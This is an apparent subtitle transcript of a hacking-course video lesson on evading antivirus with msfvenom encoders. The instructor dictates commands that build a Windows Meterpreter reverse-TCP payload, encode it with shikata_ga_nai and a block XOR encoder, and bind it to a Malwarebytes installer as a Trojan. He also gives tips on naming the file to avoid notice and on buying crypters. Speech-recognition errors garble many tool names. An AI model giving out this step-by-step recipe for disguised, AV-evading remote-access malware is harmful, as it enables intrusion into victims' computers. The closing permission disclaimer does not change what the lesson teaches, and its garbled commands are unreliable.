1
00:00:00,240 --> 00:00:02,690
Welcome to part six of this module.

2
00:00:02,790 --> 00:00:08,240
Last video we saw how to generate a payload and met a split using MSF venom.

3
00:00:08,310 --> 00:00:14,580
We did this as part of an imaginary scenario where our opponent the network administrator was a not

4
00:00:14,580 --> 00:00:17,160
so sapient chimpanzee.

5
00:00:17,160 --> 00:00:22,300
In other words our target had no antivirus or defenses of any kind.

6
00:00:22,440 --> 00:00:28,560
And while it is true that a shockingly high number of targets out there that you might be called upon

7
00:00:28,560 --> 00:00:33,990
to penetration test have lax security or even no security at all.

8
00:00:34,020 --> 00:00:38,830
We really can't proceed under the assumption that this will always be true.

9
00:00:38,910 --> 00:00:46,110
If you recall we uploaded the payload we created to Virus Total and it was immediately detected by every

10
00:00:46,110 --> 00:00:50,670
antivirus software out there as being a malicious piece of code.

11
00:00:50,670 --> 00:00:52,820
This is obviously unacceptable.

12
00:00:52,860 --> 00:01:02,160
So now it is time to start learning about encoders Briefly put we use encoders to encoder payloads and

13
00:01:02,250 --> 00:01:04,440
obfuscate what they are.

14
00:01:04,440 --> 00:01:13,200
The idea is that antivirus software is setup to recognize certain strings within code and encoders switch

15
00:01:13,200 --> 00:01:17,730
these around so that they look different but still do the same thing.

16
00:01:17,880 --> 00:01:19,730
Thus evading detection.

17
00:01:19,770 --> 00:01:27,720
Granted what I just said is a gross oversimplification of a very complex and multilayered science but

18
00:01:27,720 --> 00:01:30,590
I hope it's enough to give you the general idea.

19
00:01:30,810 --> 00:01:37,690
In a perfect world we would all be coating geniuses and could do this in a unique way ourselves.

20
00:01:37,710 --> 00:01:43,790
However very few of us have the time or inclination to figure out how to encode by hand.

21
00:01:43,860 --> 00:01:49,860
Hence why met a split comes preloaded with a wide selection of encoders for use built right into the

22
00:01:49,860 --> 00:01:51,920
framework itself.

23
00:01:51,990 --> 00:01:57,010
A few years ago encoders were almost bullet proof.

24
00:01:57,030 --> 00:02:03,930
Unfortunately as Carly and Metis Floyd have grown in popularity among penetration testers and hackers

25
00:02:03,930 --> 00:02:10,710
alike more and more antivirus companies have begun to study the unique ways each individual encoder

26
00:02:10,710 --> 00:02:16,050
works and then put out updates to detect encoded payloads.

27
00:02:16,050 --> 00:02:23,040
We get around this with a variety of tricks such as using additional iterations in the encoding process

28
00:02:23,490 --> 00:02:25,970
or even multiple different encoders.

29
00:02:26,160 --> 00:02:33,660
The antivirus companies counter with additional updates and so continues the game of cat and mouse between

30
00:02:33,660 --> 00:02:36,190
attackers and defenders.

31
00:02:36,220 --> 00:02:43,120
For that reason you aren't going to see a method in this video to create a completely undetectable payload.

32
00:02:43,330 --> 00:02:48,370
Even if such a method existed it would be obsolete soon enough.

33
00:02:48,370 --> 00:02:54,190
As a wise man once said you can fool some of the people some of the time but you can't fool all the

34
00:02:54,190 --> 00:02:56,500
people all of the time.

35
00:02:56,500 --> 00:03:03,400
Fortunately for us we really don't need to fool every single antivirus software out there.

36
00:03:03,400 --> 00:03:08,550
We only need to concentrate on the ones we are most likely to come up against.

37
00:03:08,740 --> 00:03:12,560
In particular Windows Defender and Malware bytes.

38
00:03:12,640 --> 00:03:17,270
This is also where reconnaissance of your target comes into play.

39
00:03:17,290 --> 00:03:22,880
Most systems have one antivirus and maybe Malware bytes.

40
00:03:23,230 --> 00:03:30,750
If you know what the specific defenses are and you can fool them that's really good enough so we're

41
00:03:30,750 --> 00:03:37,430
going to start out by loading the MSF console if you need a refresher on how to do this.

42
00:03:37,440 --> 00:03:47,540
We just type service post rescue will start and then MSF console.

43
00:03:47,680 --> 00:03:52,140
Now obviously I've already done this because that tends to take quite some time.

44
00:03:52,160 --> 00:04:00,730
We'll start off by typing MSF venom Tac tac help to see the optional switches that we'll be using.

45
00:04:00,920 --> 00:04:04,550
Now we're going to do exactly what we did in the last video.

46
00:04:04,550 --> 00:04:11,880
Only this time we're going to employ evasion techniques to try to get our payload around antivirus.

47
00:04:11,880 --> 00:04:18,920
The encoders included with metal split are not the only or even necessarily the best method of doing

48
00:04:18,920 --> 00:04:20,120
this by the way.

49
00:04:20,690 --> 00:04:25,070
And at the end of the video I'll speak a bit more about other options.

50
00:04:25,090 --> 00:04:33,780
Let's go over these switches really quick tack P is used to specify the payload we'll also be using

51
00:04:33,810 --> 00:04:36,830
a second tack for custom payload.

52
00:04:36,840 --> 00:04:44,400
We'll see this in the second example TAC f is going to be the output format for our payload such as

53
00:04:44,400 --> 00:04:53,370
for example e XY bean or raw TAC is very important that is used to specify the encoder and is the crux

54
00:04:53,370 --> 00:04:55,040
of this tutorial tech.

55
00:04:55,050 --> 00:05:01,830
S isn't as important but I want to mention it even though I'm getting a little ahead of myself.

56
00:05:01,920 --> 00:05:09,680
We won't be using this switch however you could use it to set a limit on the maximum size of the payload.

57
00:05:09,690 --> 00:05:15,870
This is useful because the more iterations you tell the encoder to use the bigger the payload is going

58
00:05:15,870 --> 00:05:16,970
to be.

59
00:05:16,980 --> 00:05:22,130
This is generally the difference of maybe a few hundred bytes.

60
00:05:22,200 --> 00:05:27,720
However there may be circumstances where you need to keep the file size perfectly consistent.

61
00:05:27,870 --> 00:05:35,130
That is what this which is used for tech ie stands for iterations as the description says this is the

62
00:05:35,130 --> 00:05:39,140
number of times the encoder will encode the payload.

63
00:05:39,270 --> 00:05:47,340
In theory the more times the better in practice if a payload is being detected after about 10 to 30

64
00:05:47,340 --> 00:05:54,120
iterations then it's time to consider using either a different payload or a different encoder or a different

65
00:05:54,120 --> 00:06:00,690
set of encoders you can perform thousands of iterations if you want to but after a certain point in

66
00:06:00,690 --> 00:06:05,740
either works or it doesn't and overkill won't really change that tack.

67
00:06:05,760 --> 00:06:12,030
K is used to preserve the template behaviour and inject the payload as a new thread.

68
00:06:12,030 --> 00:06:18,450
All this really means is that when we combine our payload with some other file to create a Trojan horse

69
00:06:18,810 --> 00:06:25,200
that other file will behave normally when executed the payload simply gets attached to the end of that

70
00:06:25,200 --> 00:06:27,510
file and run in sequence.

71
00:06:27,510 --> 00:06:33,570
This isn't always a good thing and it can make the malicious code easier to detect.

72
00:06:33,570 --> 00:06:39,420
But figuring out how to wedge a payload in the middle of another file and have that file perform normally

73
00:06:39,840 --> 00:06:42,440
is outside of the scope of this tutorial.

74
00:06:42,510 --> 00:06:47,130
And honestly it doesn't really make that much of a difference to the detection rate.

75
00:06:47,130 --> 00:06:55,290
Tech X is template which is used to specify a custom executable file to append to our payload or rather

76
00:06:55,290 --> 00:06:57,650
to append our payload to.

77
00:06:57,690 --> 00:07:01,230
In reality it doesn't really change the file itself.

78
00:07:01,320 --> 00:07:05,710
It creates a new copy of the file with the payload attached to it.

79
00:07:05,730 --> 00:07:12,600
Tax C isn't something we will be using in this video either but this is a really advanced switch that

80
00:07:12,600 --> 00:07:14,390
you can and should study.

81
00:07:14,520 --> 00:07:21,540
If you really want to get into payload generation this allows you to append additional code to the payload

82
00:07:21,540 --> 00:07:26,270
itself so that the code is executed along with the payload.

83
00:07:26,340 --> 00:07:34,800
Again really advanced stuff but it is possible to do things like disable certain defenses or extract

84
00:07:34,800 --> 00:07:41,760
information at the time that the payload is actually run and might even be possible to create a Windows

85
00:07:41,760 --> 00:07:49,350
task that loads the payload at certain times of the day thus granting you access again in the future

86
00:07:49,380 --> 00:07:52,000
when using the same method.

87
00:07:52,020 --> 00:07:52,350
All right.

88
00:07:52,350 --> 00:07:54,120
That was quite an info dump.

89
00:07:54,120 --> 00:07:57,900
Now let's look at the encoders that we'll be using.

90
00:07:57,900 --> 00:08:04,800
Keep in mind that your list may look different depending on when you watch this video as new encoders

91
00:08:04,800 --> 00:08:11,040
are being released and old ones that become obsolete are at least in theory being removed from the framework

92
00:08:11,310 --> 00:08:13,580
between updates so to bring up the list.

93
00:08:13,590 --> 00:08:21,060
We're gonna do M S F of venom Tak El for list and encoders.

94
00:08:21,060 --> 00:08:25,170
It'll take a few seconds for the framework to enumerate all of them.

95
00:08:25,170 --> 00:08:33,210
Remember that this list are just the ones that come prepackaged with Cally other encoders do exist and

96
00:08:33,210 --> 00:08:37,080
can be downloaded and added to the framework which is modular.

97
00:08:37,080 --> 00:08:43,950
In fact you might be able to find better or less widely known options if you search online that have

98
00:08:43,950 --> 00:08:50,430
better success rate because they are less mainstream and so the antivirus companies are less familiar

99
00:08:50,430 --> 00:08:51,280
with them.

100
00:08:51,300 --> 00:08:56,080
In any event here we have a list of all the encoders to start us off.

101
00:08:56,100 --> 00:09:03,540
We're going to use the polymorphic additive feedback encoder Shikata and I hope I'm pronouncing that

102
00:09:03,540 --> 00:09:04,600
correctly.

103
00:09:04,740 --> 00:09:06,820
This encoder is ranked Excellent.

104
00:09:06,870 --> 00:09:11,310
Which means it has been found to have a very good success rate in the past.

105
00:09:11,530 --> 00:09:16,890
She can't deny as I understand it in Japanese means unbeatable.

106
00:09:16,890 --> 00:09:22,280
Sadly it is far from unbeatable but it is going to be our starting point.

107
00:09:22,440 --> 00:09:28,950
This is a 32 bit encoders so it will work best with 32 bit XY files.

108
00:09:28,950 --> 00:09:33,060
Now I mentioned that this is a polymorphic encoder.

109
00:09:33,060 --> 00:09:34,530
What does that mean exactly.

110
00:09:34,530 --> 00:09:42,090
Well essentially a polymorphic encoder changes the encoding signature automatically and keeps changing

111
00:09:42,090 --> 00:09:45,300
it to make the payload harder to detect.

112
00:09:45,420 --> 00:09:49,920
We'll be needing our own IP address for our on our network.

113
00:09:49,920 --> 00:09:54,420
Just like last time to get this we do I f config.

114
00:09:57,700 --> 00:10:00,410
And we can see under a net right here.

115
00:10:00,420 --> 00:10:07,880
Remember that yours will vary depending on your network setup once the IP is in hand.

116
00:10:07,940 --> 00:10:10,070
We'll use it to set the El host.

117
00:10:10,130 --> 00:10:16,460
Just like in the last video I'm just going to type out the command and then I'll go through this step

118
00:10:16,460 --> 00:10:17,380
by step.

119
00:10:17,450 --> 00:10:27,200
So it's going to be M S F venom TAC P windows forward slash interpreter.

120
00:10:27,200 --> 00:10:38,360
Forgive my typing forward slash reverse DCP l host equals R IP address which in my case is going to

121
00:10:38,360 --> 00:10:41,810
be 10 0 0 0 to twenty five.

122
00:10:41,990 --> 00:10:47,330
We're going to set the L port and just like last time we're going to go with 444

123
00:10:51,010 --> 00:10:55,270
tech K tak e and we'll specify x.

124
00:10:55,310 --> 00:11:02,570
86 for its last Shikata underscore.

125
00:11:02,860 --> 00:11:10,170
Underscore Nye Tak I 250 Tak f he XY.

126
00:11:10,180 --> 00:11:11,900
Greater than sign.

127
00:11:11,950 --> 00:11:16,250
Forward slash route forward slash desktop.

128
00:11:16,570 --> 00:11:17,620
Forward slash.

129
00:11:17,620 --> 00:11:23,350
And then we give the name of the payload in this case I'm just going to call it encoded payload.

130
00:11:23,440 --> 00:11:30,580
Dot e XY nut like I said this is basically the same command that you saw in the last video we're generating

131
00:11:30,580 --> 00:11:39,320
a Windows mortar printer reverse t C.P. payload MSF then I'm Tak P for payload we specify when as mature

132
00:11:39,320 --> 00:11:45,640
printer reverse DCP although we could specify any payload that we wish to use and there are a lot of

133
00:11:45,640 --> 00:11:54,190
them for the L host we again use our own network IP address and yours will be different for this demonstration

134
00:11:54,190 --> 00:12:02,200
I'm keeping 4 4 4 4 for the L port just to make things simple and straightforward but you might consider

135
00:12:02,200 --> 00:12:08,860
using a different port but that isn't really something we need to worry about right now and tak e is

136
00:12:08,860 --> 00:12:18,370
used to specify our encoder and once again that is Shikata deny which is a 32 bit or X 86 encoder that

137
00:12:18,370 --> 00:12:26,890
is highly rated the TAC AI is four iterations or the number of times that you want to encode according

138
00:12:26,890 --> 00:12:34,030
to most documentation I've read ten is really the recommended value but such recommendations are more

139
00:12:34,030 --> 00:12:40,310
than a year old and most antivirus software has come a long way since then.

140
00:12:40,450 --> 00:12:47,050
So for that reason I've completely arbitrarily picked two hundred and fifty it will take slightly longer

141
00:12:47,050 --> 00:12:52,980
of course and the more iterations you select the larger the payload file will be.

142
00:12:53,050 --> 00:12:59,650
So keep this in mind you can get away with 10 if you think two hundred and fifty is overkill then we

143
00:12:59,650 --> 00:13:09,610
select TAC F for the format that we want and specify XY for an XY file last we use the greater than

144
00:13:09,610 --> 00:13:17,860
sign to specify the output file which we want on our desktop just to keep things straightforward you'd

145
00:13:17,860 --> 00:13:25,300
probably want to give the file an innocuous sounding name but for just right now I'm going to call it

146
00:13:25,300 --> 00:13:32,350
something easy to understand like encoded payload XY but remember whatever you call it may show up in

147
00:13:32,350 --> 00:13:39,370
a task manager so you probably do want to give this a name that won't be noticed in any case we press

148
00:13:39,400 --> 00:13:49,080
enter and this encodes our payload using Shikata Anni once encoded the payload should only be detected

149
00:13:49,080 --> 00:13:57,930
by about maybe 50 to 60 percent of the antivirus is out there instead of 100 percent but keep in mind

150
00:13:58,080 --> 00:14:05,490
this is just one way the easiest way of doing this there are additional steps that we can take to improve

151
00:14:05,490 --> 00:14:07,470
our ability to evade detection

152
00:14:10,710 --> 00:14:17,730
the important thing is that this method should allow you to evade Windows Defender at least to a certain

153
00:14:17,730 --> 00:14:25,230
extent and it has a reasonable chance of slipping past malware bytes I'm not at all trying to suggest

154
00:14:25,500 --> 00:14:33,630
that a 40 to 50 percent evasion rate is in any way great or something you should aspire to but it is

155
00:14:33,630 --> 00:14:35,190
at least a starting point.

156
00:14:37,510 --> 00:14:44,380
If we look at our desktop we can see that the file was in fact created now in the last video you saw

157
00:14:44,380 --> 00:14:51,800
me upload an on encoded payload to virus total to show off how easy it was for such a thing to be detected.

158
00:14:52,180 --> 00:14:56,510
You can upload your newly encoded payload if you want to.

159
00:14:56,560 --> 00:15:03,720
If all you want to do is see how each new method improves upon your end victory evasion rate however

160
00:15:04,080 --> 00:15:11,040
I don't recommend this unless you manage to create a payload that is 100 percent undetectable.

161
00:15:11,040 --> 00:15:15,680
You need to remember that antivirus companies tend to share their data.

162
00:15:15,750 --> 00:15:23,130
If even one of those antivirus scanners detect a virus the hash data and the other information will

163
00:15:23,130 --> 00:15:30,390
be shared across the board and your payload will be obsolete within an update or to a better strategy

164
00:15:30,420 --> 00:15:37,170
would be to create a contained virtual environment with a number of updated scanners like a Windows

165
00:15:37,170 --> 00:15:44,310
virtual box and see if your payload is able to infect it without being detected and blocked at any rate

166
00:15:44,700 --> 00:15:45,900
even at 50 percent.

167
00:15:45,900 --> 00:15:53,790
Those are pretty bad odds Shikata Kanai was a good starting point but we need to take further steps

168
00:15:53,850 --> 00:15:57,660
if we want to have the best possible chance of success.

169
00:15:57,750 --> 00:16:04,710
Now it's time to add a second encoder into the mix and we will go so far as to attach our malicious

170
00:16:04,710 --> 00:16:08,330
code to a file that looks safe.

171
00:16:08,400 --> 00:16:14,790
So once again we'll bring up the list of encoders we've used a polymorphic encoder already so let's

172
00:16:14,790 --> 00:16:21,000
choose another one using two encoders will give us a better chance that our payload will be able to

173
00:16:21,000 --> 00:16:22,760
evade detection.

174
00:16:22,770 --> 00:16:27,250
To this end let's select the blocks or metamorphic encoder.

175
00:16:27,300 --> 00:16:34,710
This is block based and it will allow us to encode a raw file into an XY file template.

176
00:16:34,980 --> 00:16:39,180
Since we are starting fresh I'm going to delete the old payload.

177
00:16:39,180 --> 00:16:46,770
We now need to export this is a bin file in raw format that is the only format that you can use in this

178
00:16:46,770 --> 00:16:47,670
case.

179
00:16:47,670 --> 00:16:57,060
It's going to look like this NSF venom attack AP windows forward slash interpreter forward slash reversed.

180
00:16:57,060 --> 00:17:08,170
CCP will set the L host once again it'll be the same network IP and we'll continue using for 44 for

181
00:17:08,170 --> 00:17:09,560
the L port.

182
00:17:09,640 --> 00:17:11,900
Doesn't really matter.

183
00:17:11,920 --> 00:17:26,130
Tak e and we will once again select the X 86 Ford slash Shikata 9 Tak I for the number of iterations.

184
00:17:26,140 --> 00:17:28,070
Which again is up to you.

185
00:17:28,090 --> 00:17:29,480
10 is recommended.

186
00:17:29,470 --> 00:17:37,960
I'm using 250 just because I feel like overkill Tak F for the format and this time we're going to specify

187
00:17:37,960 --> 00:17:47,740
it raw instead of E XY the greater than sign for our output which is going to be for Slash root or slash

188
00:17:49,010 --> 00:18:02,790
desktop forward slash and I'll just call it encoded payload dot been uh oh it hopes if we take desktop

189
00:18:02,790 --> 00:18:10,850
correctly what we're doing here is essentially outputting the payload into a raw file.

190
00:18:10,870 --> 00:18:12,160
It's the same one.

191
00:18:12,160 --> 00:18:21,020
So Windows maternity reverse TGP we're keeping all of our old settings the same and we specified the

192
00:18:21,020 --> 00:18:26,720
Shikata Ghanaian coder and this is our our first round so to speak.

193
00:18:28,420 --> 00:18:33,480
And this shooting code fairly quickly in this case we did not need to select an architecture.

194
00:18:33,670 --> 00:18:39,970
And that is because we're going to be using a template which again in this case is going to be an access

195
00:18:40,000 --> 00:18:44,380
file but any XY file will work for this.

196
00:18:44,380 --> 00:18:48,440
So you'd want it to be something that someone is likely to click on.

197
00:18:48,490 --> 00:18:50,380
It's basically a Trojan horse.

198
00:18:50,380 --> 00:18:56,110
Don't forget for this demonstration actually I'll pull it up for this demonstration.

199
00:18:56,110 --> 00:19:04,920
I've selected the malware bytes community edition installer because irony if your target is a 64 bit

200
00:19:04,950 --> 00:19:13,050
operating system or your file that you're attaching to is exclusively 64 bit and you can specify 64

201
00:19:13,050 --> 00:19:15,690
bit architecture in the next step.

202
00:19:15,690 --> 00:19:18,360
Now comes the complicated bit right.

203
00:19:18,360 --> 00:19:24,090
So I've gone ahead and cleared the screen and we'll walk through this rather a long bit of code real

204
00:19:24,090 --> 00:19:24,620
quick.

205
00:19:24,660 --> 00:19:27,900
MSF venom TAC P for payload.

206
00:19:27,900 --> 00:19:37,100
We give it an extra space and an extra dash then tack X for the XY file we want to use as our template.

207
00:19:37,230 --> 00:19:44,790
Again this is the malware bytes installer in this instance TAC K which means we don't want to make any

208
00:19:44,790 --> 00:19:47,280
changes to the malware bytes installer.

209
00:19:47,280 --> 00:19:51,450
We just want to slap our malicious code right onto the end of it.

210
00:19:51,580 --> 00:20:02,070
TAC F E XY says we want to create an EMC file as our final product TAC a is where you specify the architecture

211
00:20:02,490 --> 00:20:13,960
I'm using x 86 for 32 bit but you could use X 64 we do Tak tak platform and specify windows.

212
00:20:13,960 --> 00:20:15,460
This is very important.

213
00:20:15,520 --> 00:20:24,850
Tak e for the encoder we want to use and then we give it x eighty six blocks or TAC AI for the number

214
00:20:24,850 --> 00:20:33,070
of iterations and I'll just go with 10 4 for this instance and then we give it a greater than sign and

215
00:20:33,070 --> 00:20:38,080
specify that we want our final product to be created on the desktop.

216
00:20:38,780 --> 00:20:46,580
We would also probably want to name our file Malware bytes installer or something similar but I'm just

217
00:20:46,580 --> 00:20:49,210
going to call it Final product for this video.

218
00:20:49,550 --> 00:20:58,730
Then we use the less than sine and specify the path to the raw payload that we just created with Shikata

219
00:20:58,750 --> 00:20:59,700
can I.

220
00:20:59,720 --> 00:21:06,290
This is now taking the raw payload that we encoded with Shikata and I further encoding it with blocks

221
00:21:06,290 --> 00:21:14,090
or then creating a new XY file that is going to be our Malware bytes installer with our payload attached

222
00:21:14,090 --> 00:21:15,000
to the end.

223
00:21:15,050 --> 00:21:19,160
In this case it's going to be named final product XY.

224
00:21:19,160 --> 00:21:26,510
So when someone double clicks on this new installer Malware bytes will install and our payload will

225
00:21:26,510 --> 00:21:29,000
activate right along with it.

226
00:21:29,020 --> 00:21:35,930
Well that's the idea anyway using the polymorphic in conjunction with the metamorphic increases our

227
00:21:35,930 --> 00:21:42,020
evasion chances significantly and that was also a really fun sentence to say out loud.

228
00:21:42,050 --> 00:21:48,310
Now it's going through the iterations as we specified should be finished in just a moment.

229
00:21:48,310 --> 00:21:56,390
And there we go and note the final payload size is related to the XY file that we used as a template

230
00:21:56,840 --> 00:21:59,420
as well as the number of iterations.

231
00:21:59,420 --> 00:22:01,400
And here's our final product.

232
00:22:01,400 --> 00:22:06,350
Notice that the Malware bytes installer is still here.

233
00:22:06,560 --> 00:22:11,380
So we would want to name this something like

234
00:22:15,360 --> 00:22:20,250
Malware bytes installer or whatever.

235
00:22:20,250 --> 00:22:26,010
Now if someone were to click on this Malware bytes would install and our payload would install right

236
00:22:26,010 --> 00:22:30,980
along with it but that's not the last word on evasion not by a long shot.

237
00:22:31,080 --> 00:22:38,450
The dance between hackers creating payloads of all sorts and antivirus companies is ongoing.

238
00:22:38,520 --> 00:22:44,640
There are many many techniques that you can discover and employ several of them beyond the scope of

239
00:22:44,640 --> 00:22:46,070
this tutorial.

240
00:22:46,080 --> 00:22:52,800
This is a very deep well to dive into and remember also that the encoders that come with metal split

241
00:22:53,010 --> 00:22:55,320
are not the only ones out there.

242
00:22:55,320 --> 00:23:02,670
In fact you might have better luck if you find a few less well-known and coders online and add them

243
00:23:02,670 --> 00:23:04,890
to the MET's flight framework.

244
00:23:04,890 --> 00:23:11,910
If they're less well known it is less likely antivirus companies have their methods in their virus definitions

245
00:23:12,970 --> 00:23:17,420
so that will be about it for the subject of encoders.

246
00:23:17,440 --> 00:23:22,390
Remember you can try various combinations using the method shown here.

247
00:23:22,450 --> 00:23:26,020
You need to get creative and really work at it though.

248
00:23:26,140 --> 00:23:32,790
If you plan to go this route it is also an entirely different subject unto itself.

249
00:23:32,980 --> 00:23:40,790
But I would be remiss if I did not point out that encryption is also an option where payloads are concerned.

250
00:23:40,870 --> 00:23:48,100
There are many programs out there called cricketers which in terms of what they do are very much like

251
00:23:48,100 --> 00:23:52,720
encoders but some of them have very high success rates.

252
00:23:52,840 --> 00:24:00,280
Actually most serious hackers do not rely on the encoders that are built into Metis Floyd but either

253
00:24:00,400 --> 00:24:07,630
design their own or pay real money to download cricketers from professional creators.

254
00:24:07,630 --> 00:24:14,110
I'll touch on this subject a bit more in the modules on encryption and we'll talk about it again when

255
00:24:14,110 --> 00:24:15,740
we go over bot nets.

256
00:24:15,880 --> 00:24:17,180
But just for right now.

257
00:24:17,190 --> 00:24:21,430
Note that there are still several alternatives out there.

258
00:24:21,430 --> 00:24:30,160
If you find that the encoders are not satisfactory I will not be recommending any third party encoder

259
00:24:30,190 --> 00:24:32,340
or scripture in these videos however.

260
00:24:32,710 --> 00:24:37,500
So you must do your own due diligence and find such things on your own.

261
00:24:37,570 --> 00:24:44,410
If this is something that interests you all right then that pretty much covers the basics of encoders

262
00:24:44,920 --> 00:24:45,730
as always.

263
00:24:45,730 --> 00:24:52,060
Never use anything demonstrated in these videos against any target that you do not have written permission

264
00:24:52,060 --> 00:24:56,830
from the owner to penetration test abide by the law at all times.

265
00:24:56,830 --> 00:24:59,860
Thank you for your attention and will pick up in the next video.